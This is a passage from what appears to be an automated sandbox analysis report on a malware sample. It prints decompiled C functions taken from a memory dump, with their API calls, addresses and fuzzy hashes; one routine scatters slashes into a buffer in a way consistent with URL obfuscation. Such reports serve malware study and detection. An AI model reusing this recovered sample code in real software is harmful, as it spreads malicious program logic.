                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7421B372D00139ABCB78AFE8D8C49EEB7ABEF45254F054025FB12E3100D734D9618BA1
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 68%
                                                                                                                                                                                                                                          			E01124858(unsigned int __eax, void* __ecx) {
                                                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                          				signed int _t21;
                                                                                                                                                                                                                                          				signed short _t23;
                                                                                                                                                                                                                                          				char* _t27;
                                                                                                                                                                                                                                          				void* _t29;
                                                                                                                                                                                                                                          				void* _t30;
                                                                                                                                                                                                                                          				unsigned int _t33;
                                                                                                                                                                                                                                          				void* _t37;
                                                                                                                                                                                                                                          				unsigned int _t38;
                                                                                                                                                                                                                                          				void* _t41;
                                                                                                                                                                                                                                          				void* _t42;
                                                                                                                                                                                                                                          				int _t45;
                                                                                                                                                                                                                                          				void* _t46;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_t42 = __eax;
                                                                                                                                                                                                                                          				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                                                                                                                                                                                                                                          				_t38 = __eax;
                                                                                                                                                                                                                                          				_t30 = RtlAllocateHeap( *0x112d238, 0, (__eax >> 3) + __eax + 1);
                                                                                                                                                                                                                                          				_v12 = _t30;
                                                                                                                                                                                                                                          				if(_t30 != 0) {
                                                                                                                                                                                                                                          					_v8 = _t42;
                                                                                                                                                                                                                                          					do {
                                                                                                                                                                                                                                          						_t33 = 0x18;
                                                                                                                                                                                                                                          						if(_t38 <= _t33) {
                                                                                                                                                                                                                                          							_t33 = _t38;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						_t21 =  *0x112d250; // 0x26bd5990
                                                                                                                                                                                                                                          						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                                                                                                                                                                                                                                          						 *0x112d250 = _t23;
                                                                                                                                                                                                                                          						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                                                                                                                                                                                                                                          						memcpy(_t30, _v8, _t45);
                                                                                                                                                                                                                                          						_v8 = _v8 + _t45;
                                                                                                                                                                                                                                          						_t27 = _t30 + _t45;
                                                                                                                                                                                                                                          						_t38 = _t38 - _t45;
                                                                                                                                                                                                                                          						_t46 = _t46 + 0xc;
                                                                                                                                                                                                                                          						 *_t27 = 0x2f;
                                                                                                                                                                                                                                          						_t13 = _t27 + 1; // 0x1
                                                                                                                                                                                                                                          						_t30 = _t13;
                                                                                                                                                                                                                                          					} while (_t38 > 8);
                                                                                                                                                                                                                                          					memcpy(_t30, _v8, _t38 + 1);
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				return _v12;
                                                                                                                                                                                                                                          			}

















                                                                                                                                                                                                                                          0x01124860
                                                                                                                                                                                                                                          0x01124863
                                                                                                                                                                                                                                          0x01124869
                                                                                                                                                                                                                                          0x01124881
                                                                                                                                                                                                                                          0x01124883
                                                                                                                                                                                                                                          0x01124888
                                                                                                                                                                                                                                          0x0112488a
                                                                                                                                                                                                                                          0x0112488d
                                                                                                                                                                                                                                          0x0112488f
                                                                                                                                                                                                                                          0x01124892
                                                                                                                                                                                                                                          0x01124894
                                                                                                                                                                                                                                          0x01124894
                                                                                                                                                                                                                                          0x01124896
                                                                                                                                                                                                                                          0x011248a1
                                                                                                                                                                                                                                          0x011248a6
                                                                                                                                                                                                                                          0x011248b7
                                                                                                                                                                                                                                          0x011248bf
                                                                                                                                                                                                                                          0x011248c4
                                                                                                                                                                                                                                          0x011248c7
                                                                                                                                                                                                                                          0x011248ca
                                                                                                                                                                                                                                          0x011248cc
                                                                                                                                                                                                                                          0x011248cf
                                                                                                                                                                                                                                          0x011248d2
                                                                                                                                                                                                                                          0x011248d2
                                                                                                                                                                                                                                          0x011248d5
                                                                                                                                                                                                                                          0x011248e0
                                                                                                                                                                                                                                          0x011248e5
                                                                                                                                                                                                                                          0x011248ef

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,01124DBF,00000000,?,?,011252FE,?,056495B0), ref: 01124863
                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 0112487B
                                                                                                                                                                                                                                          • memcpy.NTDLL(00000000,?,-00000008,?,?,?,01124DBF,00000000,?,?,011252FE,?,056495B0), ref: 011248BF
                                                                                                                                                                                                                                          • memcpy.NTDLL(00000001,?,00000001), ref: 011248E0
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpy$AllocateHeaplstrlen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1819133394-0
                                                                                                                                                                                                                                          • Opcode ID: dd7c5405d47ef4b97dbef6e20e98366778ab095c3a5652c7905bd0435edd3b4f
                                                                                                                                                                                                                                          • Instruction ID: 9cd3276cc508d18115befc12024cc34721e14a664c418ea1f1d413fa74455a9f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dd7c5405d47ef4b97dbef6e20e98366778ab095c3a5652c7905bd0435edd3b4f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F2112976A00154BFD7288FA9EC84E9EBFEEDBD5260B150176F504D7240E7749E10C7A0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 53%
                                                                                                                                                                                                                                          			E01126AF7(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                                                                          				void* _t8;
                                                                                                                                                                                                                                          				void* _t13;
                                                                                                                                                                                                                                          				void* _t16;
                                                                                                                                                                                                                                          				char* _t18;
                                                                                                                                                                                                                                          				void* _t19;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_t19 = 0x27;
                                                                                                                                                                                                                                          				_t1 =  &_v20; // 0x74666f53
                                                                                                                                                                                                                                          				_t18 = 0;
                                                                                                                                                                                                                                          				E01126F89(_t8, _t1);
                                                                                                                                                                                                                                          				_t16 = E011258BE(_t19);
                                                                                                                                                                                                                                          				if(_t16 != 0) {
                                                                                                                                                                                                                                          					_t3 =  &_v20; // 0x74666f53
                                                                                                                                                                                                                                          					_t13 = E01129038(_t3, _t16, _a8);
                                                                                                                                                                                                                                          					if(_a4 != 0) {
                                                                                                                                                                                                                                          						__imp__(_a4);
                                                                                                                                                                                                                                          						_t19 = _t13 + 0x27;
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					_t18 = E011258BE(_t19);
                                                                                                                                                                                                                                          					if(_t18 != 0) {
                                                                                                                                                                                                                                          						 *_t18 = 0;
                                                                                                                                                                                                                                          						if(_a4 != 0) {
                                                                                                                                                                                                                                          							__imp__(_t18, _a4);
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						__imp__(_t18, _t16);
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					E0112147E(_t16);
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				return _t18;
                                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                                          0x01126b02
                                                                                                                                                                                                                                          0x01126b03
                                                                                                                                                                                                                                          0x01126b06
                                                                                                                                                                                                                                          0x01126b08
                                                                                                                                                                                                                                          0x01126b13
                                                                                                                                                                                                                                          0x01126b17
                                                                                                                                                                                                                                          0x01126b1c
                                                                                                                                                                                                                                          0x01126b20
                                                                                                                                                                                                                                          0x01126b28
                                                                                                                                                                                                                                          0x01126b2d
                                                                                                                                                                                                                                          0x01126b35
                                                                                                                                                                                                                                          0x01126b35
                                                                                                                                                                                                                                          0x01126b3e
                                                                                                                                                                                                                                          0x01126b42
                                                                                                                                                                                                                                          0x01126b48
                                                                                                                                                                                                                                          0x01126b4b
                                                                                                                                                                                                                                          0x01126b51
                                                                                                                                                                                                                                          0x01126b51
                                                                                                                                                                                                                                          0x01126b59
                                                                                                                                                                                                                                          0x01126b59
                                                                                                                                                                                                                                          0x01126b60
                                                                                                                                                                                                                                          0x01126b60
                                                                                                                                                                                                                                          0x01126b6b

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 011258BE: RtlAllocateHeap.NTDLL(00000000,-00000008,01121C51), ref: 011258CA
                                                                                                                                                                                                                                            • Part of subcall function 01129038: wsprintfA.USER32 ref: 01129094
                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?,00000000,00000000,00000027,00000005,00000000,00000000,01122098,74666F53,00000000,?,0112D00C,?,?), ref: 01126B2D
                                                                                                                                                                                                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 01126B51
                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 01126B59
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
                                                                                                                                                                                                                                          • String ID: Soft
                                                                                                                                                                                                                                          • API String ID: 393707159-3753413193
                                                                                                                                                                                                                                          • Opcode ID: 5e2fe7a68c8cdb644512ee0a4b7d0d03c5e72e1104d4cca56a7c061024f28abc
                                                                                                                                                                                                                                          • Instruction ID: 97bb9eba8abd27f57b61e3ff9e02193ebde99fbbdd3866c3b2222bfb494e58b6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e2fe7a68c8cdb644512ee0a4b7d0d03c5e72e1104d4cca56a7c061024f28abc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A01A23660022A7BDB2A2BA89C88EEF7A6D9F95249F044020FF149A144DB788565C7E5
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                          			E01127283(void* __esi) {
                                                                                                                                                                                                                                          				struct _SECURITY_ATTRIBUTES* _v4;
                                                                                                                                                                                                                                          				void* _t8;
                                                                                                                                                                                                                                          				void* _t10;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_v4 = 0;
                                                                                                                                                                                                                                          				memset(__esi, 0, 0x38);
                                                                                                                                                                                                                                          				_t8 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                          				 *(__esi + 0x1c) = _t8;
                                                                                                                                                                                                                                          				if(_t8 != 0) {
                                                                                                                                                                                                                                          					_t10 = CreateEventA(0, 1, 1, 0);
                                                                                                                                                                                                                                          					 *(__esi + 0x20) = _t10;
                                                                                                                                                                                                                                          					if(_t10 == 0) {
                                                                                                                                                                                                                                          						CloseHandle( *(__esi + 0x1c));
                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                          						_v4 = 1;
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				return _v4;
                                                                                                                                                                                                                                          			}






                                                                                                                                                                                                                                          0x0112728d
                                                                                                                                                                                                                                          0x01127291
                                                                                                                                                                                                                                          0x011272a6
                                                                                                                                                                                                                                          0x011272a8
                                                                                                                                                                                                                                          0x011272ad
                                                                                                                                                                                                                                          0x011272b3
                                                                                                                                                                                                                                          0x011272b5
                                                                                                                                                                                                                                          0x011272ba
                                                                                                                                                                                                                                          0x011272c5
                                                                                                                                                                                                                                          0x011272bc
                                                                                                                                                                                                                                          0x011272bc
                                                                                                                                                                                                                                          0x011272bc
                                                                                                                                                                                                                                          0x011272ba
                                                                                                                                                                                                                                          0x011272d3

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.NTDLL ref: 01127291
                                                                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,751881D0), ref: 011272A6
                                                                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 011272B3
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 011272C5
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateEvent$CloseHandlememset
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2812548120-0
                                                                                                                                                                                                                                          • Opcode ID: 9769b6af2f177355d9ff7b7283b1255b0785cb49616479c4f42785686e6c5e5c
                                                                                                                                                                                                                                          • Instruction ID: fd737803ae7348e81360d01f5df3ed1be42e1d2d42e9c3eb02ee33a36a8e9b1b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9769b6af2f177355d9ff7b7283b1255b0785cb49616479c4f42785686e6c5e5c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6EF054B1104718BFD3245F65DCC4C2BFB9CFB66198B12492EF14281141C675A8144B70
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 68%
                                                                                                                                                                                                                                          			E0112A2EF(int __eax, char _a4) {
                                                                                                                                                                                                                                          				void* _v0;
                                                                                                                                                                                                                                          				void* _t12;
                                                                                                                                                                                                                                          				int _t13;
                                                                                                                                                                                                                                          				int _t14;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_t1 =  &_a4; // 0x4d283a53
                                                                                                                                                                                                                                          				_t14 = __eax;
                                                                                                                                                                                                                                          				__imp__( *_t1);
                                                                                                                                                                                                                                          				_t13 = __eax;
                                                                                                                                                                                                                                          				if(__eax > __eax) {
                                                                                                                                                                                                                                          					_t14 = __eax;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				_t2 = _t14 + 1; // 0x1
                                                                                                                                                                                                                                          				_t12 = E011258BE(_t2);
                                                                                                                                                                                                                                          				if(_t12 != 0) {
                                                                                                                                                                                                                                          					memcpy(_t12, _v0, _t13);
                                                                                                                                                                                                                                          					memset(_t12 + _t13, 0, _t14 - _t13 + 1);
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				return _t12;
                                                                                                                                                                                                                                          			}







                                                                                                                                                                                                                                          0x0112a2f2
                                                                                                                                                                                                                                          0x0112a2f6
                                                                                                                                                                                                                                          0x0112a2f8
                                                                                                                                                                                                                                          0x0112a2fe
                                                                                                                                                                                                                                          0x0112a302
                                                                                                                                                                                                                                          0x0112a304
                                                                                                                                                                                                                                          0x0112a304
                                                                                                                                                                                                                                          0x0112a306
                                                                                                                                                                                                                                          0x0112a30f
                                                                                                                                                                                                                                          0x0112a313
                                                                                                                                                                                                                                          0x0112a31b
                                                                                                                                                                                                                                          0x0112a32a
                                                                                                                                                                                                                                          0x0112a32f
                                                                                                                                                                                                                                          0x0112a337

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • lstrlen.KERNEL32(S:(M,00000000,7748D3B0,?,01129AA8,00000000,00000005,0112D00C,00000008,?,?,59935A40,?,?,59935A40), ref: 0112A2F8
                                                                                                                                                                                                                                          • memcpy.NTDLL(00000000,?,00000000,00000001,?,?,?,01124A8B,?,?,?,4D283A53,?,?), ref: 0112A31B
                                                                                                                                                                                                                                          • memset.NTDLL ref: 0112A32A
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: lstrlenmemcpymemset
                                                                                                                                                                                                                                          • String ID: S:(M
                                                                                                                                                                                                                                          • API String ID: 4042389641-2217774225
                                                                                                                                                                                                                                          • Opcode ID: 9ab865c44031bf7bf5757679b411fa4e965f42d73047a25589b82104186dc700
                                                                                                                                                                                                                                          • Instruction ID: 44c55879700f09fb7c35ec9d9cacf34346251c748f433788e1398e0036fc2688
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9ab865c44031bf7bf5757679b411fa4e965f42d73047a25589b82104186dc700
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69E0E573A052326BC630AAB95C88D4F6A9DEFD8250B000435FA15C7204E7A4CC2486B0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 50%
                                                                                                                                                                                                                                          			E01124C3A(void** __esi) {
                                                                                                                                                                                                                                          				char* _v0;
                                                                                                                                                                                                                                          				intOrPtr _t4;
                                                                                                                                                                                                                                          				intOrPtr _t6;
                                                                                                                                                                                                                                          				void* _t8;
                                                                                                                                                                                                                                          				intOrPtr _t11;
                                                                                                                                                                                                                                          				void* _t12;
                                                                                                                                                                                                                                          				void** _t14;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_t14 = __esi;
                                                                                                                                                                                                                                          				_t4 =  *0x112d324; // 0x56495b0
                                                                                                                                                                                                                                          				__imp__(_t4 + 0x40);
                                                                                                                                                                                                                                          				while(1) {
                                                                                                                                                                                                                                          					_t6 =  *0x112d324; // 0x56495b0
                                                                                                                                                                                                                                          					_t1 = _t6 + 0x58; // 0x0
                                                                                                                                                                                                                                          					if( *_t1 == 0) {
                                                                                                                                                                                                                                          						break;
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					Sleep(0xa);
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				_t8 =  *_t14;
                                                                                                                                                                                                                                          				if(_t8 != 0 && _t8 != 0x112d030) {
                                                                                                                                                                                                                                          					HeapFree( *0x112d238, 0, _t8);
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				_t14[1] = E01127C75(_v0, _t14);
                                                                                                                                                                                                                                          				_t11 =  *0x112d324; // 0x56495b0
                                                                                                                                                                                                                                          				_t12 = _t11 + 0x40;
                                                                                                                                                                                                                                          				__imp__(_t12);
                                                                                                                                                                                                                                          				return _t12;
                                                                                                                                                                                                                                          			}










                                                                                                                                                                                                                                          0x01124c3a
                                                                                                                                                                                                                                          0x01124c3a
                                                                                                                                                                                                                                          0x01124c43
                                                                                                                                                                                                                                          0x01124c53
                                                                                                                                                                                                                                          0x01124c53
                                                                                                                                                                                                                                          0x01124c58
                                                                                                                                                                                                                                          0x01124c5d
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x01124c4d
                                                                                                                                                                                                                                          0x01124c4d
                                                                                                                                                                                                                                          0x01124c5f
                                                                                                                                                                                                                                          0x01124c63
                                                                                                                                                                                                                                          0x01124c75
                                                                                                                                                                                                                                          0x01124c75
                                                                                                                                                                                                                                          0x01124c85
                                                                                                                                                                                                                                          0x01124c88
                                                                                                                                                                                                                                          0x01124c8d
                                                                                                                                                                                                                                          0x01124c91
                                                                                                                                                                                                                                          0x01124c97

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(05649570), ref: 01124C43
                                                                                                                                                                                                                                          • Sleep.KERNEL32(0000000A,?,?,?,01124A8B,?,?,?,4D283A53,?,?), ref: 01124C4D
                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,01124A8B,?,?,?,4D283A53,?,?), ref: 01124C75
                                                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(05649570), ref: 01124C91
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 58946197-0
                                                                                                                                                                                                                                          • Opcode ID: 0ccc59b20e5f39d45f9482d6bccfcbed9aae68178de8c6f4ec54df1b8f6d3229
                                                                                                                                                                                                                                          • Instruction ID: 5cd9a7d316c846ee4fcba8e38ec2bd2404fb6fb6b31f6a34d5db4e3276208c55
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ccc59b20e5f39d45f9482d6bccfcbed9aae68178de8c6f4ec54df1b8f6d3229
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E0F05E74600210BBEB3CCFACEA48F0A77E8AF25344B004424F622D7258C724D8B0CB5D
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                          			E011278AD() {
                                                                                                                                                                                                                                          				void* _t1;
                                                                                                                                                                                                                                          				intOrPtr _t5;
                                                                                                                                                                                                                                          				void* _t6;
                                                                                                                                                                                                                                          				void* _t7;
                                                                                                                                                                                                                                          				void* _t11;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_t1 =  *0x112d26c; // 0x33c
                                                                                                                                                                                                                                          				if(_t1 == 0) {
                                                                                                                                                                                                                                          					L8:
                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				SetEvent(_t1);
                                                                                                                                                                                                                                          				_t11 = 0x7fffffff;
                                                                                                                                                                                                                                          				while(1) {
                                                                                                                                                                                                                                          					SleepEx(0x64, 1);
                                                                                                                                                                                                                                          					_t5 =  *0x112d2b8; // 0x0
                                                                                                                                                                                                                                          					if(_t5 == 0) {
                                                                                                                                                                                                                                          						break;
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					_t11 = _t11 - 0x64;
                                                                                                                                                                                                                                          					if(_t11 > 0) {
                                                                                                                                                                                                                                          						continue;
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					break;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				_t6 =  *0x112d26c; // 0x33c
                                                                                                                                                                                                                                          				if(_t6 != 0) {
                                                                                                                                                                                                                                          					CloseHandle(_t6);
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				_t7 =  *0x112d238; // 0x5250000
                                                                                                                                                                                                                                          				if(_t7 != 0) {
                                                                                                                                                                                                                                          					HeapDestroy(_t7);
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				goto L8;
                                                                                                                                                                                                                                          			}








                                                                                                                                                                                                                                          0x011278ad
                                                                                                                                                                                                                                          0x011278b4
                                                                                                                                                                                                                                          0x011278fe
                                                                                                                                                                                                                                          0x01127900
                                                                                                                                                                                                                                          0x01127900
                                                                                                                                                                                                                                          0x011278b8
                                                                                                                                                                                                                                          0x011278be
                                                                                                                                                                                                                                          0x011278c3
                                                                                                                                                                                                                                          0x011278c7
                                                                                                                                                                                                                                          0x011278cd
                                                                                                                                                                                                                                          0x011278d4
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x011278d6
                                                                                                                                                                                                                                          0x011278db
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x011278db
                                                                                                                                                                                                                                          0x011278dd
                                                                                                                                                                                                                                          0x011278e5
                                                                                                                                                                                                                                          0x011278e8
                                                                                                                                                                                                                                          0x011278e8
                                                                                                                                                                                                                                          0x011278ee
                                                                                                                                                                                                                                          0x011278f5
                                                                                                                                                                                                                                          0x011278f8
                                                                                                                                                                                                                                          0x011278f8
                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SetEvent.KERNEL32(0000033C,00000001,01126F2D), ref: 011278B8
                                                                                                                                                                                                                                          • SleepEx.KERNEL32(00000064,00000001), ref: 011278C7
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(0000033C), ref: 011278E8
                                                                                                                                                                                                                                          • HeapDestroy.KERNEL32(05250000), ref: 011278F8
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CloseDestroyEventHandleHeapSleep
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4109453060-0
                                                                                                                                                                                                                                          • Opcode ID: c31daec9898ffa41ee30794af9a3017ec61a5aba1b8e00d3de07ae66f84ece15
                                                                                                                                                                                                                                          • Instruction ID: 8757dec1beb37ca9179d2f897da9bbddb17b4810e85c7b786f657b4dfa21424d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c31daec9898ffa41ee30794af9a3017ec61a5aba1b8e00d3de07ae66f84ece15
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CFF01276A01321BBEA3C5E79E948B077B999B166617140530FA24D71C8DBA4C4A0D7A4
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 37%
                                                                                                                                                                                                                                          			E01129B10() {
                                                                                                                                                                                                                                          				void* _v0;
                                                                                                                                                                                                                                          				void** _t3;
                                                                                                                                                                                                                                          				void** _t5;
                                                                                                                                                                                                                                          				void** _t7;
                                                                                                                                                                                                                                          				void** _t8;
                                                                                                                                                                                                                                          				void* _t10;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_t3 =  *0x112d324; // 0x56495b0
                                                                                                                                                                                                                                          				__imp__( &(_t3[0x10]));
                                                                                                                                                                                                                                          				while(1) {
                                                                                                                                                                                                                                          					_t5 =  *0x112d324; // 0x56495b0
                                                                                                                                                                                                                                          					_t1 =  &(_t5[0x16]); // 0x0
                                                                                                                                                                                                                                          					if( *_t1 == 0) {
                                                                                                                                                                                                                                          						break;
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					Sleep(0xa);
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				_t7 =  *0x112d324; // 0x56495b0
                                                                                                                                                                                                                                          				_t10 =  *_t7;
                                                                                                                                                                                                                                          				if(_t10 != 0 && _t10 != 0x112e845) {
                                                                                                                                                                                                                                          					HeapFree( *0x112d238, 0, _t10);
                                                                                                                                                                                                                                          					_t7 =  *0x112d324; // 0x56495b0
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				 *_t7 = _v0;
                                                                                                                                                                                                                                          				_t8 =  &(_t7[0x10]);
